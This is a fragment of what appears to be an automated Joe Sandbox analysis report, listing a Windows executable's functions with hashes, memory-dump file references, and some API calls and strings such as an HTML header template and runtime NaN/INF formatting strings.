Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c0cbe991248eb7d6dd2bdd37362e5a28fbd04f2b0c4932e8cce588cea7c1786
Instruction ID: 498810f0790c88c553230fac86e4e89b0c1d2fbaa36e283670e87b5fb20a46bf
Opcode Fuzzy Hash: 0c0cbe991248eb7d6dd2bdd37362e5a28fbd04f2b0c4932e8cce588cea7c1786
Instruction Fuzzy Hash: 5D32EEB3A041918BDB18CF28D180BBC37A5F755B48F058239DB9A9BB84DB3DE850DB45

Function 00007FF6EF6C0120 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e582973e46ee1d1bbff86c995794ab6c4f310ea02d2fa0097d1d9ba58cd8d491
Instruction ID: 9ded014937ff9c34226accda8132bff7d8ade109372895b22d5a26b9bee93996
Opcode Fuzzy Hash: e582973e46ee1d1bbff86c995794ab6c4f310ea02d2fa0097d1d9ba58cd8d491
Instruction Fuzzy Hash: E0022333B182929BEF18CF35C4547BC3BA9F784748B104135DA8AD7A84DE3AE905EB45

Function 00007FF6EF6B55F8 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a675779c0a6b0be9e3e04f3c458a34ee5153780744a853d0e31ffead1378c3ad
Instruction ID: 7d655cbf08d37b72061cd8ebd661126f7e0a43d3679eee4273b548834c46203d
Opcode Fuzzy Hash: a675779c0a6b0be9e3e04f3c458a34ee5153780744a853d0e31ffead1378c3ad
Instruction Fuzzy Hash: BDC18DB7B281908FE350CF7AE400A9D3BB1F39878CB515125EF59A7B09D639E645CB40

Function 00007FF6EF6C9378 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b77ff0de2180197d5abe245d85c68975241c1dcfee4eb65c98bfae10a8646dbf
Instruction ID: bd0a4c73f79f531dbf57e79472a1e77ae4777309e578bae90020965833e028c1
Opcode Fuzzy Hash: b77ff0de2180197d5abe245d85c68975241c1dcfee4eb65c98bfae10a8646dbf
Instruction Fuzzy Hash: C9B1EE73A0828243FB24DE25C1047F82B59EB54744F454535DE8EAFB86EE3EE501E74A

Function 00007FF6EF6C71AC Relevance: .3, Instructions: 267COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bc03492221088800660013e63436c151ffe41c7898f5dbda68953aeee311606
Instruction ID: 7a76911b154c28f0aa5e3dc6da4e698f71d072acd7ca11a3e12c3df7b362608c
Opcode Fuzzy Hash: 6bc03492221088800660013e63436c151ffe41c7898f5dbda68953aeee311606
Instruction Fuzzy Hash: 60B1A333A0868287EF549E25D4407B92798FB84B84F848435DE8E9F785DF3EE841E749

Function 00007FF6EF6C9790 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7a61a9209b4d91c9ba3fe6146ace80c99470f41a1b2cdafbd2d55048e5282e3
Instruction ID: 001eeb5545df4a5c103f88d6c07812aeb61b3bb128617da9fad87787963ac31c
Opcode Fuzzy Hash: e7a61a9209b4d91c9ba3fe6146ace80c99470f41a1b2cdafbd2d55048e5282e3
Instruction Fuzzy Hash: A5911363E0918247FF249A25C4047FC3B89EB90744F564535DA8E8F786EE3EE941E34A

Function 00007FF6EF6C2D78 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e24c2bbcc9eed20f3b582e814e52ae550e5df8d7a27c1e2a07864485e850579a
Instruction ID: 97e4da6c3d8dbebb81f5fea2e025b4ad3967ffaa1b9a7f749c4f8c9a519aa1de
Opcode Fuzzy Hash: e24c2bbcc9eed20f3b582e814e52ae550e5df8d7a27c1e2a07864485e850579a
Instruction Fuzzy Hash: 31C10333B255E08EE302CBB5A4248FE3FB0E75D74E7464251EFD6A7B4AD5295102DB20

Function 00007FF6EF6B78E4 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 4c9b3be8c64ce580a07a63af19af8dfa726a7205dd75bbc4a456f91aab7e9158
Instruction ID: 59b20a97b9d56b98fcd51e7e2b383ee79dcc68be5c036477b3a0ed60e8fd020e
Opcode Fuzzy Hash: 4c9b3be8c64ce580a07a63af19af8dfa726a7205dd75bbc4a456f91aab7e9158
Instruction Fuzzy Hash: 7C910E63B1868297EB11DF29D4113F92721FF95788F401131EE8E8B74AEE3AE606C705

Function 00007FF6EF6B7C4C Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e64f8328962af0ce979ec0e96bddce3357ccad217ce66c4e4bd4005140bcd5d2
Instruction ID: b979a1ab2c71f8655db3eecb4d10cc65903bd85a4199b83e8d50460caf6a338c
Opcode Fuzzy Hash: e64f8328962af0ce979ec0e96bddce3357ccad217ce66c4e4bd4005140bcd5d2
Instruction Fuzzy Hash: 14811323B1879297EB10DB25D8407ED6768FB85788F844031EE8D8BB9ADE3ED505DB01

Function 00007FF6EF6C3394 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f7230c342ae2100ed36ea600aec1d38a6da362237e74277c922723301cc9c2
Instruction ID: e1787088c405a84b25734c032545d4865883fc2e2b13a4c03650a3b039f5554f
Opcode Fuzzy Hash: 69f7230c342ae2100ed36ea600aec1d38a6da362237e74277c922723301cc9c2
Instruction Fuzzy Hash: C6612263B181D14BEB02CF7485015FD7FB9A709784B858032CE9A9B646CE3EE106EB15

Function 00007FF6EF6C4704 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4798c3a2a7591c4c39b80090bb9b628f29d68ab3708a04f3ea7b16de1cbaf6b6
Instruction ID: 59c3d1ffed323075aace76163505f1a77884c4e6cafd00e96c5c52df97f4e141
Opcode Fuzzy Hash: 4798c3a2a7591c4c39b80090bb9b628f29d68ab3708a04f3ea7b16de1cbaf6b6
Instruction Fuzzy Hash: E9518F37B286908BD764CF25E404A9A73A5F388798F455126EF8A93B09CF3DE945CF40

Function 00007FF6EF6C8858 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30a5c52b9124f9242aa6ea2df2ae17cf6492ab15682df05a934dc9edbe29ae65
Instruction ID: e33a479d8ee2aff57849dfb183eac43dad8202bd400668d22b5b296d9a45da30
Opcode Fuzzy Hash: 30a5c52b9124f9242aa6ea2df2ae17cf6492ab15682df05a934dc9edbe29ae65
Instruction Fuzzy Hash: A7516573B181518BEB288F38D4147BD3755F780749F454134CA8E8BA8ADE3EEA41DB06

Function 00007FF6EF6C9AFC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccdda5fca87e64d118c2421eade8f54bbfe42dc1d7452a6bab233b803d5547bf
Instruction ID: 225a753ebc71bc60e4f0adfc151a4de31c420a0549b42fddb44fc96be20ea01a
Opcode Fuzzy Hash: ccdda5fca87e64d118c2421eade8f54bbfe42dc1d7452a6bab233b803d5547bf
Instruction Fuzzy Hash: 91512473A1468587DB08DF14C08037CB7A5F795B58F188135CA8A8BB89CF3DE842DB55

Function 00007FF6EF6C9060 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c0ad47c5dbdf0d76251ce8f1e14de5a986814ba3e2cc7165d56d98a6725ef0c
Instruction ID: 9261f1a14d9eb72b99455dea7f2ad1f3523d0cea604a73faa7c51c9610d4bbb6
Opcode Fuzzy Hash: 5c0ad47c5dbdf0d76251ce8f1e14de5a986814ba3e2cc7165d56d98a6725ef0c
Instruction Fuzzy Hash: B931E3B3A185824BEB08DE16DA513BE7B95F745740F048439EB8ACBB85DE3EE445C701

Function 00007FF6EF6C4E78 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5852029dbc0ce463896b4f8196b6243869ef963d9e7f9ccb60a74bfb739e6291
Instruction ID: 9c67ae7728de9b81dc42088f19c8a5027e65e747c0488b97ccd018e5359deaf3
Opcode Fuzzy Hash: 5852029dbc0ce463896b4f8196b6243869ef963d9e7f9ccb60a74bfb739e6291
Instruction Fuzzy Hash: D4F0D463F2C10783FF68D028981933913499BA8314F66C83AD09ACE2C5DC5FA9B1310F

Function 00007FF6EF6D756C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0c1b5387afa24fdc5f2f2df594e0a2e6bc3351a6963a1bbc3c85c0b3800b28c
Instruction ID: e8cd7947c2dd4e4690d02d5a02f60e7bd745c55ab731c0e726f25011b30a4553
Opcode Fuzzy Hash: a0c1b5387afa24fdc5f2f2df594e0a2e6bc3351a6963a1bbc3c85c0b3800b28c
Instruction Fuzzy Hash: 09A00123918806DBEA449B00A8506202328BBA0300BD00131E01EC50A0AE2EA510E70B

Function 00007FF6EF6CF908 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

wcscpy.LIBCMT ref: 00007FF6EF6CF969
wcscat.LIBCMT ref: 00007FF6EF6CF978
wcscat.LIBCMT ref: 00007FF6EF6CF987
wcscat.LIBCMT ref: 00007FF6EF6CF9C8
wcscat.LIBCMT ref: 00007FF6EF6CF9DB
GlobalAlloc.KERNEL32(?,?,?,?,?,00007FF6EF6D05FB), ref: 00007FF6EF6CFA0F
WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6CFA47
CreateStreamOnHGlobal.COMBASE ref: 00007FF6EF6CFA74

Strings

</html>, xrefs: 00007FF6EF6CF9D1
, xrefs: 00007FF6EF6CF98C
<html>, xrefs: 00007FF6EF6CF95F, 00007FF6EF6CF9A7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00007FF6EF6CF96E
utf-8"></head>, xrefs: 00007FF6EF6CF97D

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: wcscat$Global$AllocByteCharCreateMultiStreamWidewcscpy
String ID: $</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3314394749-1507786326
Opcode ID: 52b965630d59adb05454bcad9a7b334c9918c3c9847670556ddf0182290c5d9f
Instruction ID: 69bec57a0a74a78a667abbee2bce152f59ffc25832469f295566f200eeea7ee7
Opcode Fuzzy Hash: 52b965630d59adb05454bcad9a7b334c9918c3c9847670556ddf0182290c5d9f
Instruction Fuzzy Hash: EE41A463A08B4283EF14EB26A9543796369AF84BC0F444131DE4D8B7A6DF3EE505D70A

Function 00007FF6EF6E2998 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6EF6E2B15

Strings

NAN, xrefs: 00007FF6EF6E29F9
inf, xrefs: 00007FF6EF6E2A1E
nan(snan), xrefs: 00007FF6EF6E2A38
nan, xrefs: 00007FF6EF6E2A00
nan(ind), xrefs: 00007FF6EF6E2A4E
NAN(SNAN), xrefs: 00007FF6EF6E2A2D
INF, xrefs: 00007FF6EF6E2A0B
NAN(IND), xrefs: 00007FF6EF6E2A43

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 830a02f2d1ce28f0f26177b07792ed9f188223e13c7520931e8b97b82f32b3d6
Instruction ID: d684d33623443dff6c549ec60688d378ed40eea2515b6dff51ad07ed6465da4c
Opcode Fuzzy Hash: 830a02f2d1ce28f0f26177b07792ed9f188223e13c7520931e8b97b82f32b3d6
Instruction Fuzzy Hash: D441DD33A09B459BEB44CF21E8417A933A8EB44398F204136EE4C87B99DE3ED125D349

Function 00007FF6EF6D2100 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

